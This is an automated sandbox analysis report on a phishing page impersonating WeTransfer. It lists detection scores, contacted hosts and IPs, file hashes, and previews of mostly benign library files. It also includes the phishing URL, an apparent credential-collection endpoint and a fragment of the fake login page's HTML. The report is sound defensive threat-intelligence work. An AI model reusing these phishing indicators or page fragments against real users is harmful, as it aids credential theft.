      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://certain-jeweled-verse.glitch.me/newson.htm14%VirustotalBrowse
      https://certain-jeweled-verse.glitch.me/newson.htm100%SlashNextCredential Stealing type: Phishing & Social usering
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      excel567.oss-ap-southeast-3.aliyuncs.com1%VirustotalBrowse
      cdn.glitch.me0%VirustotalBrowse
      stackpath.bootstrapcdn.com0%VirustotalBrowse
      certain-jeweled-verse.glitch.me6%VirustotalBrowse
      code.jquery.com1%VirustotalBrowse
      cdn.glitch.com2%VirustotalBrowse
      www.google.com0%VirustotalBrowse
      fp2e7a.wpc.phicdn.net0%VirustotalBrowse
      maxcdn.bootstrapcdn.com0%VirustotalBrowse
      cdnjs.cloudflare.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js0%URL Reputationsafe
      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js0%URL Reputationsafe
      http://opensource.org/licenses/MIT).0%URL Reputationsafe
      https://getbootstrap.com/)0%URL Reputationsafe
      https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico0%VirustotalBrowse
      https://drive.google.com/drive/u/0/my-drive0%VirustotalBrowse
      https://excel567.oss-ap-southeast-3.aliyuncs.com/pdf.js1%VirustotalBrowse
      https://github.com/twbs/bootstrap/graphs/contributors)0%VirustotalBrowse
      https://github.com/twbs/bootstrap/blob/master/LICENSE)0%VirustotalBrowse
      https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=16003765856367%VirustotalBrowse
      https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js0%VirustotalBrowse
      https://code.jquery.com/jquery-3.2.1.slim.min.js1%VirustotalBrowse
      https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg?v=16003765734082%VirustotalBrowse
      https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      stackpath.bootstrapcdn.com
      104.18.10.207
      truefalseunknown
      excel567.oss-ap-southeast-3.aliyuncs.com
      47.254.218.78
      truefalseunknown
      cdn.glitch.me
      65.9.95.85
      truefalseunknown
      certain-jeweled-verse.glitch.me
      54.211.144.142
      truefalseunknown
      cdn.glitch.com
      18.173.205.20
      truefalseunknown
      code.jquery.com
      151.101.2.137
      truefalseunknown
      cdnjs.cloudflare.com
      104.17.25.14
      truefalseunknown
      maxcdn.bootstrapcdn.com
      104.18.11.207
      truefalseunknown
      www.google.com
      216.58.206.68
      truefalseunknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636falseunknown
      https://excel567.oss-ap-southeast-3.aliyuncs.com/pdf.jsfalseunknown
      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
      • URL Reputation: safe
      unknown
      https://code.jquery.com/jquery-3.2.1.slim.min.jsfalseunknown
      https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalseunknown
      https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.icofalseunknown
      https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg?v=1600376573408falseunknown
      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
      • URL Reputation: safe
      unknown
      https://certain-jeweled-verse.glitch.me/newson.htmtrue
        unknown
        https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpgfalseunknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://drive.google.com/drive/u/0/my-drivechromecache_57.2.drfalseunknown
        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_58.2.dr, chromecache_71.2.dr, chromecache_65.2.dr, chromecache_72.2.drfalseunknown
        https://getbootstrap.com)chromecache_58.2.dr, chromecache_72.2.drfalse
          unknown
          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_58.2.dr, chromecache_71.2.dr, chromecache_65.2.dr, chromecache_72.2.drfalseunknown
          http://opensource.org/licenses/MIT).chromecache_70.2.dr, chromecache_62.2.drfalse
          • URL Reputation: safe
          unknown
          https://eesfdhd.gq/new/Wetransfer-2020/post.phpchromecache_57.2.drfalse
            unknown
            https://getbootstrap.com/)chromecache_71.2.dr, chromecache_65.2.drfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            104.17.24.14
            unknownUnited States
            13335CLOUDFLARENETUSfalse
            47.254.218.78
            excel567.oss-ap-southeast-3.aliyuncs.comUnited States
            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
            104.18.10.207
            stackpath.bootstrapcdn.comUnited States
            13335CLOUDFLARENETUSfalse
            18.173.205.20
            cdn.glitch.comUnited States
            3MIT-GATEWAYSUSfalse
            216.58.206.68
            www.google.comUnited States
            15169GOOGLEUSfalse
            151.101.130.137
            unknownUnited States
            54113FASTLYUSfalse
            151.101.2.137
            code.jquery.comUnited States
            54113FASTLYUSfalse
            104.18.11.207
            maxcdn.bootstrapcdn.comUnited States
            13335CLOUDFLARENETUSfalse
            239.255.255.250
            unknownReserved
            unknownunknownfalse
            65.9.95.85
            cdn.glitch.meUnited States
            16509AMAZON-02USfalse
            54.211.144.142
            certain-jeweled-verse.glitch.meUnited States
            14618AMAZON-AESUSfalse
            104.17.25.14
            cdnjs.cloudflare.comUnited States
            13335CLOUDFLARENETUSfalse
            IP
            192.168.2.6
            192.168.2.5
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1521840
            Start date and time:2024-09-29 04:31:42 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 56s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:browseurl.jbs
            Sample URL:https://certain-jeweled-verse.glitch.me/newson.htm
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal72.phis.win@16/25@28/14
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 142.250.185.67, 216.58.206.46, 142.250.110.84, 34.104.35.123, 142.250.186.42, 142.250.185.202, 142.250.185.74, 142.250.185.106, 142.250.184.234, 142.250.185.170, 172.217.23.106, 216.58.212.170, 142.250.186.138, 172.217.16.138, 142.250.185.138, 142.250.184.202, 142.250.185.234, 172.217.18.106, 216.58.206.42, 142.250.186.170, 142.250.181.234, 52.165.165.26, 192.229.221.95, 52.165.164.15, 93.184.221.240, 13.85.23.206, 104.102.63.47, 142.250.186.35
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, e15275.d.akamaiedge.net, wu.ec.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            No simulations
            InputOutput
            URL: https://certain-jeweled-verse.glitch.me/newson.htm Model: jbxai
            {
            "brand":["WeTransfer"],
            "contains_trigger_text":true,
            "trigger_text":"Send up to 20GB",
            "prominent_button_name":"Get Plus",
            "text_input_field_labels":["Document 1.pdf",
            "Document 2.pdf",
            "Document 3.pdf"],
            "pdf_icon_visible":false,
            "has_visible_captcha":false,
            "has_urgent_text":false,
            "has_visible_qrcode":false}
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text
            Category:downloaded
            Size (bytes):10086
            Entropy (8bit):5.182898076053884
            Encrypted:false
            SSDEEP:192:oKSDS95CdjuVwLOtdjr8Bwlm+nIr1l3IqQo1CfGOCGpCXqq6jylq5ij:otWDCsqLOtVLm+nIr1l49yOPzij
            MD5:B772FEF3AD5098D61FD59E89819A5D86
            SHA1:1476E689B70B1001F2BF194D6AC53FDB3370CDA0
            SHA-256:64D661E5494536337785CE798BF62FECB87FB6E324220D1CAEEBA88427E27F78
            SHA-512:E0407B4B7F28A9FFD37C926081B62D6311A3081BFFF0D8A88C887E5F3A2EEC88A1DB45DBA488CEDEAC4923BB88AEE6F4DB2684A6DC2FD03E1FD2F34E0E03F031
            Malicious:false
            Reputation:low
            URL:https://certain-jeweled-verse.glitch.me/newson.htm
            Preview:<html>.<head>.<meta name="viewport" content="width=device-width, initial-scale=1">.<script src="https://excel567.oss-ap-southeast-3.aliyuncs.com/pdf.js"></script>.<link rel="shortcut icon" href="https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636" type="image/x-icon" />...<title>We Transfer</title>.<style>..topnav {. overflow: hidden;. background-color: #000000;.}...topnav a {. float: left;. color: #000000;. text-align: center;. padding: 14px 16px;. text-decoration: none;. font-size: 17px;.}...topnav a:hover {. background-color: #000000;. color: Yellow;.}...topnav a.active {. background-color: #000000;. color: Red;.}...body {font-family: Arial, Helvetica, sans-serif;}..input[type=text], input[type=email] {. width: 39%;. padding: 12px 20px;. margin: 8px 0;. display: inline-block;. border: 1px solid #ccc;. box-sizing: border-box;.}...input[type=text], input[type=email], input[type=password] {. width: 39%;. padding: 12
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (48664)
            Category:downloaded
            Size (bytes):48944
            Entropy (8bit):5.272507874206726
            Encrypted:false
            SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
            MD5:14D449EB8876FA55E1EF3C2CC52B0C17
            SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
            SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
            SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
            Malicious:false
            Reputation:low
            URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
            Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
            Category:downloaded
            Size (bytes):41566
            Entropy (8bit):2.306414372045211
            Encrypted:false
            SSDEEP:96:pnvhextGn8hK7mxOBsOqHJt46FWJisw0msSieZQckSpyt:pnZHKzxOeOqf46FWuASjQcA
            MD5:692E1C7339C359B6412F059C9C9A0474
            SHA1:E7C1A53DCA16B7664880E5B8A92524CF9A47FB62
            SHA-256:D12161435ACE47C6883360E08466508593325F134C1852B1D0E6E75D5F76ADDA
            SHA-512:115B958093186BF5F98BECED2BDE91775121083B1E73F720372D793A23EBC7CF130CC4C6196F5F0D725A809FD63997666AE1DE36CF070DCB6B6D2178C6796894
            Malicious:false
            Reputation:low
            URL:https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico
            Preview:............ .(...V......... .h...~... .... .(.......00.... .(-...%..@@.... .(P..6R..(....... ..... ............................................................................................................................................................................................................................................................................................................................................"...................k.......=.......R.......P...........K...................9...................+...................4...........................-...............................................P...3...........r...............................\...........................X....................................................................................................... ...........................d...............................T.......+..............................................................................................................................
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32012)
            Category:dropped
            Size (bytes):69597
            Entropy (8bit):5.369216080582935
            Encrypted:false
            SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
            MD5:5F48FC77CAC90C4778FA24EC9C57F37D
            SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
            SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
            SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
            Malicious:false
            Reputation:low
            Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1365x612, components 3
            Category:dropped
            Size (bytes):117459
            Entropy (8bit):7.93555718082096
            Encrypted:false
            SSDEEP:3072:+WDRPZeWbvqPx2IkT53bWzVvjcTin0tcKbX8ROKq28uORj:7RBeKcxFkYzVrcVtnbX84Kq2+
            MD5:6E5B76B6F1740D6D21C8D968A0364DF6
            SHA1:1D4847612905D7D14700DC5F1F1378B4D6379925
            SHA-256:2A8281EBAEEE4DBC6452CBCA892800EBAE3B1159AFE72AE30313B1C9262F0667
            SHA-512:6D30A74DBB56D06F39840DEA74E662B42844299A05F6B18582FF776D4703B79C003BA918CBBEC29914BC662C5A2CE92D6F0DF73D0EF1FC9A9E9D52727F4BCEB7
            Malicious:false
            Reputation:low
            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................d.U.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...4.[{R...J.;..}g...m...k.....U..;.F~..8p?..L..5.m_._..(.|........M....5....<....u...W..o.....?.c.~....5..(Y..VH_I.#-..Vf...Tn9..~?:.j..FT........._...{?...S...vF.O.D.7}{.f..W(........j.....c....Rh?..E%..."...%..[n..(b.'.......B.?.K....w.....uQ...H...p<...~..m..'..l.OYU..+Y4.F..+......_....kx...SXh.O...Io$.ndm.....X.........T._..._M...C..\@...D.).W..B.). .
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (19015)
            Category:downloaded
            Size (bytes):19188
            Entropy (8bit):5.212814407014048
            Encrypted:false
            SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
            MD5:70D3FDA195602FE8B75E0097EED74DDE
            SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
            SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
            SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
            Malicious:false
            Reputation:low
            URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
            Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32065)
            Category:dropped
            Size (bytes):75266
            Entropy (8bit):5.372761466499463
            Encrypted:false
            SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9g:v4J+OlfOhWppCg
            MD5:8E96260BECE91D4FD5CC59ABCDB6676A
            SHA1:78031B2361D574A863FAD7722A4E5B17D9F537A7
            SHA-256:2E2A2F21151CDC20C5B80FB7047095DC2E86F70C99582F8BA5A700C78BABD21D
            SHA-512:2C6EB0431DB028807812B6F58040DA0AB32AC30E8C512F29E9C3045ECE82F37283400D8B20BE9948F48CDB26EF5FEED2FFE116B02E39043192A09B3C3251665A
            Malicious:false
            Reputation:low
            Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1365x612, components 3
            Category:downloaded
            Size (bytes):117459
            Entropy (8bit):7.93555718082096
            Encrypted:false
            SSDEEP:3072:+WDRPZeWbvqPx2IkT53bWzVvjcTin0tcKbX8ROKq28uORj:7RBeKcxFkYzVrcVtnbX84Kq2+
            MD5:6E5B76B6F1740D6D21C8D968A0364DF6
            SHA1:1D4847612905D7D14700DC5F1F1378B4D6379925
            SHA-256:2A8281EBAEEE4DBC6452CBCA892800EBAE3B1159AFE72AE30313B1C9262F0667
            SHA-512:6D30A74DBB56D06F39840DEA74E662B42844299A05F6B18582FF776D4703B79C003BA918CBBEC29914BC662C5A2CE92D6F0DF73D0EF1FC9A9E9D52727F4BCEB7
            Malicious:false
            Reputation:low
            URL:https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg
            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................d.U.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...4.[{R...J.;..}g...m...k.....U..;.F~..8p?..L..5.m_._..(.|........M....5....<....u...W..o.....?.c.~....5..(Y..VH_I.#-..Vf...Tn9..~?:.j..FT........._...{?...S...vF.O.D.7}{.f..W(........j.....c....Rh?..E%..."...%..[n..(b.'.......B.?.K....w.....uQ...H...p<...~..m..'..l.OYU..+Y4.F..+......_....kx...SXh.O...Io$.ndm.....X.........T._..._M...C..\@...D.).W..B.). .
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (50758)
            Category:dropped
            Size (bytes):51039
            Entropy (8bit):5.247253437401007
            Encrypted:false
            SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
            MD5:67176C242E1BDC20603C878DEE836DF3
            SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
            SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
            SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
            Malicious:false
            Reputation:low
            Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32012)
            Category:downloaded
            Size (bytes):69597
            Entropy (8bit):5.369216080582935
            Encrypted:false
            SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
            MD5:5F48FC77CAC90C4778FA24EC9C57F37D
            SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
            SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
            SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
            Malicious:false
            Reputation:low
            URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
            Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
            Category:dropped
            Size (bytes):41566
            Entropy (8bit):2.306414372045211
            Encrypted:false
            SSDEEP:96:pnvhextGn8hK7mxOBsOqHJt46FWJisw0msSieZQckSpyt:pnZHKzxOeOqf46FWuASjQcA
            MD5:692E1C7339C359B6412F059C9C9A0474
            SHA1:E7C1A53DCA16B7664880E5B8A92524CF9A47FB62
            SHA-256:D12161435ACE47C6883360E08466508593325F134C1852B1D0E6E75D5F76ADDA
            SHA-512:115B958093186BF5F98BECED2BDE91775121083B1E73F720372D793A23EBC7CF130CC4C6196F5F0D725A809FD63997666AE1DE36CF070DCB6B6D2178C6796894
            Malicious:false
            Reputation:low
            Preview:............ .(...V......... .h...~... .... .(.......00.... .(-...%..@@.... .(P..6R..(....... ..... ............................................................................................................................................................................................................................................................................................................................................"...................k.......=.......R.......P...........K...................9...................+...................4...........................-...............................................P...3...........r...............................\...........................X....................................................................................................... ...........................d...............................T.......+..............................................................................................................................
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):28
            Entropy (8bit):4.378783493486175
            Encrypted:false
            SSDEEP:3:qinPt:qyPt
            MD5:4C42AB4890733A2B01B1B3269C4855E7
            SHA1:5B68BFE664DCBC629042EA45C23954EEF1A9F698
            SHA-256:F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010
            SHA-512:0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C
            Malicious:false
            Reputation:low
            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwm08z6_HAZc9xIFDYOoWz0SBQ3OQUx6?alt=proto
            Preview:ChIKBw2DqFs9GgAKBw3OQUx6GgA=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32065)
            Category:downloaded
            Size (bytes):85578
            Entropy (8bit):5.366055229017455
            Encrypted:false
            SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
            MD5:2F6B11A7E914718E0290410E85366FE9
